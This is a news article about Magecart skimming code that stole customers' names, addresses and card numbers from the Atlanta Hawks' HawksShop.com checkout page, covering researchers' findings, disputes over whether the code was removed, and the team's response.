Cybercriminals using Magecart card-skimming code attacked the online store of the NBA’s Atlanta Hawks, stealing customers names, addresses and payment card numbers.
The Sanguine Labs team at Sanguine Security identified the offending code on the store’s checkout page on Saturday April 20, according to a post on the security company’s website. But research from RiskIQ following this public disclose revealed that the website, HawksShop.com, had been compromised far longer than that.
“The first time we detected skimming code on the website was June 6th of 2017, RiskIQ threat researcher Yonathan Klijnsma, Threat Researcher told SC Media. “The compromise wasn’t targeted however, it was one aimed at hundreds of websites at the same time.”
In an April 23 article, CNET reported that an Atlanta Hawks team representative said the malware is no longer active on the site. However, in a tweet published one day later, Sanguine Labs’ lead forensic analyst Willem de Groot responded to this claim by asking “Is it?” and displaying an image of apparent Magecart code, which suggests the problem code still remained.
As of 1 p.m. ET on April 24, HawksShop.com was temporarily down for maintenance, presumably to fix the issue. But de Groot told SC Media that this response only occurred very recently, after his tweet had been published.
“This week, I had reached out to the customer service, and also to their CRO, CIO and director of IT, but have not heard back since, de Groot,” said to SC Media.
“We take these matters of security and privacy extremely seriously,” said a statement sent to SC Media by the Hawks’ organization. “Yesterday, we were alerted the host site for HawksShop.com was subject to an isolated attack. Upon receiving that information, we disabled all payment and checkout capabilities to prevent any further incident. At this stage of the investigation, we believe that less than a handful of purchases on HawksShop.com were affected. We are continuing to investigate and will provide updates as needed.”
The statement did not address any of the other points of contention referenced by de Groot.
HawksShop.com runs on Adobe’s Magento Commerce Cloud 2.2 e-commerce system. Sanguine Labs suspects the intruders may have compromised the system via an insecure third-party component.
Sanguine researchers also linked this incident to malicious domain imagesengines.com, where stolen customer information was exfiltrated. The domain was very recently registered on March 25, 2019.
The Magecart threat has grown in prominence over the last year, especially after attackers struck several big-name targets, including Ticketmaster UK, British Airways and Newegg.